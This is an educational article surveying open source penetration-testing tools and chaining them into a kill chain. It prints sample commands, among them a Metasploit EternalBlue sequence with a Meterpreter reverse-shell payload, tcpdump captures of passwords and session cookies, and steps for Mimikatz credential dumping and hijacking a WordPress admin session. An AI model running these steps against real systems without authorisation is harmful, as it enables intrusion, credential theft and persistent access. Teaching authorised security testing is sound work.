Open source penetration testing technologies

This article provides an overview of the major open source technologies that form the backbone of modern penetration testing. We explore the core features and practical applications of essential tools, including Nmap for network discovery, OpenVAS for vulnerability scanning, tcpdump for traffic analysis, Metasploit for exploitation, and Burp Suite and OWASP ZAP for web application security. Understanding the distinct role of each tool as well as how tools complement each other is fundamental to executing a systematic and effective security assessment.

• Introduction
• Nmap: Network reconnaissance, scanning, and enumeration
• OpenVAS: Vulnerability assessment
• tcpdump: Traffic analysis and forensics
• Metasploit: Exploitation and post-exploitation
• Burp Suite Community Edition: Web application proxy and manual testing platform
• OWASP ZAP: Open source web application security scanner

I obtained my PhD in Digital Transformation and Innovation in April 2020 from the PhD in DTI uOttawa Program, School-EECS, Faculty of Engineering. I did my PhD thesis (titled Technoethics and sensemaking: Risk assessment and knowledge management of ethical hacking in a sociotechnical society) on the topic of ethical hacking sociotechnology (thesis advisory committee: uOttawa professors Rocci Luppicini, Liam Peyton, and Andre Vellino).

You may also be interested in Practical foundations in penetration testing.

Introduction

Penetration testing relies on a suite of specialized tools to systematically identify vulnerabilities, exploit weaknesses, and validate an organization's security posture. This process, often conceptualized as a "kill chain", involves progressive phases: reconnaissance, scanning and enumeration, gaining access, maintaining access, and covering tracks. Among the vast array of available utilities, Nmap, OpenVAS, tcpdump, Metasploit, Burp Suite, and OWASP ZAP serve as core technologies, each addressing distinct phases or needs of the penetration test lifecycle. Mastering this toolkit is not just about learning individual commands, but understanding how to strategically chain these tools together to simulate sophisticated attacks and provide actionable insights for hardening defenses.

Nmap: Network reconnaissance, scanning, and enumeration

Nmap (Network Mapper) is the de facto standard for host discovery, port scanning, and service enumeration. Using a variety of scan techniques—including SYN scans (-sS), OS fingerprinting (-O), and version detection (-sV)—Nmap provides a detailed map of network assets and the services running on them. During the initial reconnaissance phase, a penetration tester might execute a command such as nmap -A -T4 192.168.1.0/24 to perform an aggressive scan of a target subnet. This single command combines OS and version detection with script scanning and traceroute, quickly revealing open ports (e.g., SSH on port 22, HTTP on port 80), service banners, and potential attack vectors. The -A flag enables aggressive scanning options, bundling OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) into a single convenient switch. The -T4 timing template accelerates the scan under the assumption of a stable, high-speed network, though testers should exercise caution as it may trigger intrusion detection systems or overwhelm fragile targets.

Beyond its core scanning engine, the Nmap Scripting Engine (NSE) extends Nmap's utility into deeper enumeration, vulnerability detection, and even limited exploitation. Once open ports are identified, NSE scripts can perform detailed service interrogation: banner retrieves full service banners, http-headers extracts HTTP response headers, smb-enum-shares lists accessible Windows file shares, and ftp-anon checks for anonymous FTP access. Moving further down the kill chain, NSE offers vulnerability detection scripts such as http-vuln-cve2021-44228 for Log4j, smb-vuln-ms17-010 for EternalBlue, and ssl-heartbleed for the Heartbleed flaw.

At the outer edge of its capabilities, NSE includes scripts that attempt credential brute-force attacks (e.g., ftp-brute, ssh-brute, smb-brute) or leverage specific misconfigurations to extract sensitive files (e.g., http-shellshock, http-phpmyadmin-dir-traversal). This progression—from enumeration through vulnerability identification to limited exploitation—demonstrates why Nmap remains indispensable well beyond the initial scan. Its output forms the foundational intelligence that informs deeper vulnerability scanning with OpenVAS and subsequent exploitation with Metasploit.

OpenVAS: Vulnerability assessment

OpenVAS specializes in deep vulnerability scanning. OpenVAS is the scanner component of the Greenbone Vulnerability Management (GVM) framework, but the name OpenVAS remains commonly used to refer to the entire vulnerability scanning suite. OpenVAS leverages a continuously updated database of CVEs and misconfigurations to detect weaknesses like unpatched software, services that are known to use default credentials, or SSL/TLS flaws. For instance, an OpenVAS scan might reveal a Windows host missing MS17-010 patches (EternalBlue), prompting further exploitation with Metasploit. Similarly, an OpenVAS scan of a Linux web server might detect a Tomcat instance still configured with default credentials (e.g., admin:admin) or identify an outdated OpenSSL version vulnerable to Heartbleed (CVE-2014-0160), both of which provide clear paths to compromise.

A key strength of OpenVAS is its structured approach to vulnerability management. Scan results are prioritized by severity (Critical, High, Medium, Low), providing a clear roadmap for remediation efforts. OpenVAS provides detailed information for each finding, including the associated CVE, a description of the vulnerability, its potential impact, and often a solution for patching or mitigation. This transforms raw scan data into an actionable report, enabling security teams to focus on the most critical risks first. This comprehensive and auditable process is essential for meeting regulatory requirements and maintaining a strong security posture over time.

Nmap vs OpenVAS: Functionality/capability comparison

Both Nmap and OpenVAS perform authenticated and unauthenticated scans. But Nmap performs authenticated scans in a more limited, script-driven capacity. Nmap's authenticated scanning is an extension of its scripting engine, not its core purpose. Many advanced scripts of the Nmap Scripting Engine (NSE) can perform authenticated checks, used for targeted information gathering. For example, scripts can use provided credentials to log into a service (e.g., SSH, SMB, or HTTP) to gather more detailed information such as system users, shared folders, or application configurations.

OpenVAS can perform authenticated scans (the vulnerability scanner logs into the target system using user credentials) for deeper access, making it critical for compliance audits (e.g., PCI-DSS). However, the majority of OpenVAS's checks are performed remotely without credentials. This includes testing for unpatched services (e.g., an outdated Apache version), checking for default credentials on network services, and identifying SSL/TLS flaws. OpenVAS can also be configured with credentials to perform deeper, targeted checks. This is a separate, powerful feature that allows it to find vulnerabilities like missing software patches (e.g., the MS17-010 EternalBlue patch) by checking the system's internal version data, rather than relying on external probes alone.

Both Nmap and OpenVAS use scripts, but OpenVAS's scripts are more comprehensive than Nmap's. OpenVAS uses a system of Network Vulnerability Tests (NVTs). Think of NVTs as specialized scripts each designed to check for a specific vulnerability (CVE), misconfiguration, or compliance policy. OpenVAS's entire scanning engine is built upon executing these tens of thousands of NVTs from its continuously updated database.

Nmap's Two-Layer Capabilities

To understand Nmap's capabilities, it's helpful to think of it as consisting of two layers:

1. The Core Engine: This is Nmap's fundamental functionality for unauthenticated scanning:

• Host Discovery (-sn)
• Port Scanning (-sS, -sT, etc.)
• Service & Version Detection (-sV)
• OS Fingerprinting (-O)

2. The Nmap Scripting Engine (NSE): This is an add-on system that extends the core engine. It allows users to run scripts for more advanced, specific tasks. The NSE is where Nmap's authenticated scanning happens.

The Nmap NSE provides a framework where scripts can be passed credentials (usernames/passwords/keys) via command-line arguments. These scripts then use those credentials to log into services and perform deeper checks.

Examples of NSE scripts doing authenticated scanning:

• smb-enum-sessions: Uses provided SMB credentials to list logged-in users and session details.
• http-auth-finder: Can use provided credentials to access protected web pages and look for authentication forms.
• ssh-auth-methods: Can use an SSH key to log in and check which authentication methods are supported.

Nmap and OpenVAS Functionality/Capability Summary Table

While Nmap excels at discovering live hosts and mapping network services, OpenVAS specializes in deep vulnerability assessment.

In a typical workflow, a security professional might use Nmap first to find active hosts and open ports, and then use OpenVAS to perform a deep vulnerability scan against those discovered targets.

tcpdump: Traffic analysis and forensics

tcpdump provides packet-level visibility into network traffic, essential for debugging attacks or monitoring suspicious activity. During a penetration test, a tester might use tcpdump -i eth0 port 80 -w http.pcap to capture HTTP traffic for analysis (e.g., finding cleartext passwords). tcpdump is also invaluable for MITM (Man-in-the-Middle) attacks—filtering ARP spoofing traffic (tcpdump arp) or extracting DNS queries (port 53). Unlike GUI tools like Wireshark, tcpdump is lightweight and scriptable, ideal for remote servers or stealthy operations.

The true power of tcpdump lies in its sophisticated filtering capabilities, which allow a tester to isolate specific traffic patterns from a high-volume data stream. Filters can be built using Boolean logic and primitives for hosts, networks, protocols, and port numbers. For example, the command tcpdump -i any 'host 192.168.1.5 and tcp port 443' would capture only encrypted web traffic to or from the specific target, reducing noise. To detect potential network scanning, a filter like tcpdump 'tcp[13] & 2!=0' (tcpdump 'tcp[tcpflags] == tcp-syn') captures only TCP SYN packets, which often indicate a port scan in progress. Mastering these filters is critical for efficient evidence collection and real-time threat detection during an engagement.

Furthermore, tcpdump is indispensable for forensic analysis and validating exploit delivery. After an attack vector is exploited, a penetration tester can use tcpdump to capture the exact network packets exchanged, providing proof of a vulnerability. For instance, while launching a reverse shell payload from Metasploit, running tcpdump on the target network can capture the outgoing connection attempt back to the attacker's machine. This packet capture (pcap) file can be analyzed to see the raw shellcode transmission or to extract files transferred over the network, such as exfiltrated data or uploaded tools. This ability to record and review the precise sequence of network events makes it an essential tool for both attack simulation and incident response.

Metasploit: Exploitation and post-exploitation

Metasploit Framework (Open Source Edition) is a tool for developing and executing exploit code against a remote target machine. It is a sub-project of The Metasploit Project, which is owned by Rapid7. The Metasploit Framework automates exploitation and post-exploitation workflows. Its modular design includes exploits (e.g., multi/handler for reverse shells), payloads (e.g., Meterpreter), and auxiliary modules (e.g., SMB brute-forcing). For example, after identifying an unpatched SMB service via Nmap, a pentester could deploy exploit/windows/smb/ms17_010_eternalblue to gain a shell. Metasploit’s post-modules (e.g., hashdump, mimikatz) enable lateral movement, privilege escalation, and data exfiltration, simulating advanced persistent threats (APTs).

A typical exploitation workflow within Metasploit follows a structured sequence. A tester begins by selecting an exploit (use exploit/windows/smb/ms17_010_eternalblue), then configures the required options such as the target host (set RHOSTS 192.168.1.10) and port (set RPORT 445). Next, a payload is chosen and configured (set PAYLOAD windows/x64/meterpreter/reverse_tcp and set LHOST 192.168.1.5). Upon executing the exploit command, if successful, the framework delivers the payload and establishes a session, providing the tester with remote access to the target machine. This streamlined process turns a known vulnerability into a concrete access point with minimal manual effort.

Beyond initial access, Metasploit's true power is its extensive post-exploitation capabilities, largely delivered through the Meterpreter payload. Meterpreter provides a robust, in-memory command-and-control agent that avoids writing to the disk, reducing the chance of detection. From a Meterpreter session, a tester can perform a wide array of actions, such as keylogging, taking screenshots, pivoting to other networks, and maintaining persistence. Furthermore, the load command within Meterpreter can extend its functionality on-the-fly, for instance by loading the kiwi module to interface with the Mimikatz tool for credential dumping directly from memory. This makes Metasploit an all-in-one platform for not just breaking in, but for thoroughly exploring what an attacker can accomplish once inside a network.

Burp Suite Community Edition: Web application proxy and manual testing platform

Burp Suite dominates the field of web application penetration testing by providing an integrated platform of specialized tools. It is available in two versions: Burp Suite Professional (paid) and Burp Suite Community Edition. Burp Suite's core components include:

• The Proxy, which allows testers to intercept, inspect, and modify all HTTP/S traffic between the browser and the target application, crucial for bypassing client-side validation.
• The Repeater tool enables manual manipulation and resending of individual requests to test for vulnerabilities like insecure direct object references or logic flaws.
• The Intruder automates attacks such as brute-forcing login forms, fuzzing parameters for injection points, and enumerating values.

The key differences between Burp Suite Professional and Burp Suite Community Edition pertain to the following features:

• Automated Scanning: The core differentiator. Pro has an automated active vulnerability scanner for detecting SQLi, XSS, and CSRF; Community does not.
• Manual Testing Tools: Pro offers unlimited use of Intruder (fuzzing) and Repeater; Community's versions are rate-limited and lack advanced features.
• Out-of-Band Testing: Pro includes Burp Collaborator for detecting blind SSRF or out-of-band (OOB) vulnerabilities; Community has no equivalent.
• Workflow & Reporting: Pro has advanced workflow features (task scheduler, saved configurations) and detailed reporting; Community's workflow is entirely manual.
• Use Case: Pro is for professional, efficient testing; Community is for learning, simple tasks, or manual-only testing.

OWASP ZAP: Open source web application security scanner

OWASP ZAP (Zed Attack Proxy) is a leading open source web application security scanner, maintained under the Open Web Application Security Project (OWASP) umbrella. It is designed to be a comprehensive and accessible tool for finding vulnerabilities in web applications during both development and testing phases. Key features include an intercepting proxy for manual testing, automated scanners for passive and active vulnerability detection, and a suite of tools for fuzzing and spidering. For example, its AJAX Spider can effectively crawl modern, dynamic applications, while the active scanner can automatically test for flaws like SQL Injection and Cross-Site Scripting (XSS). ZAP's "heads-up display" (HUD) introduces a novel, integrated approach by providing security information and testing capabilities directly within the browser. Its open source nature and strong community support make it a popular alternative to commercial scanners, especially for automated security testing in CI/CD pipelines.

Comparison of Web Application Testing Tools

The following diagram maps the core penetration testing tools covered in this article onto a unified toolkit. It shows each tool’s primary role and the typical flow of data — from initial reconnaissance through to exploitation — that turns a collection of individual utilities into a cohesive testing platform.

The integration of these core tools in a penetration test forms a kill chain:

1. Nmap scouts the network.
2. OpenVAS pinpoints vulnerabilities.
3. tcpdump captures sensitive data in transit.
4. Burp Suite/OWASP ZAP manipulates and hijacks web sessions.
5. Metasploit delivers payloads and maintains access.

For instance, a tester might:

• Use Nmap to discover an exposed WordPress site (port 80).
• Run OpenVAS to detect CVE-2022-3590 (SQLi in a vulnerable plugin).
• Use tcpdump to passively capture the HTTP session cookie transmitted after a test login (tcpdump -i eth0 -A port 80).
• Import the captured cookie into Burp Suite to hijack the administrator's authenticated session.
• Deploy Metasploit's wp_admin_shell_upload module through the hijacked session to upload a reverse shell and establish persistent access.

Mastering these tools requires understanding their strengths and limitations. Nmap and OpenVAS excel at discovery, while Metasploit and Burp Suite/ZAP drive exploitation. tcpdump provides low-level insights for advanced attacks. Together, they enable comprehensive security assessments, from external network scans to web app hijacking, aligning with CEH and OSCP methodologies.

Key takeaways

• A skilled pentester chains testing tools strategically, simulating real-world attacks to harden defenses.
• Each core tool has a distinct primary function: Nmap for network discovery and enumeration, OpenVAS for in-depth vulnerability assessment, tcpdump for traffic analysis, Metasploit for exploitation, and Burp Suite/ZAP for web application testing.
• Understanding the strengths and limitations of each tool is critical; for example, using Nmap for initial host discovery before launching a more intensive, targeted OpenVAS vulnerability scan.
• Command-line tools like tcpdump and Nmap offer scriptability and lightweight operation for remote or stealthy assessments, while GUI-based tools like Burp Suite provide deep interactivity for web testing.
• The Metasploit Framework encapsulates the entire exploitation lifecycle, from delivering a payload to extensive post-exploitation activities like lateral movement and persistence.

References

Kennedy, D., O’Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The Penetration Tester's Guide. No Starch Press.

Lyon, G. (2009). Nmap network scanning: The official Nmap project guide to network discovery and security scanning. Insecure.com LLC.

OWASP Zed Attack Proxy Project. (n.d.). OWASP ZAP documentation. The OWASP Foundation. Retrieved April 27, 2026, from https://www.zaproxy.org/docs/

Stuttard, D., & Pinto, M. (2011). The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (2nd ed.). Wiley.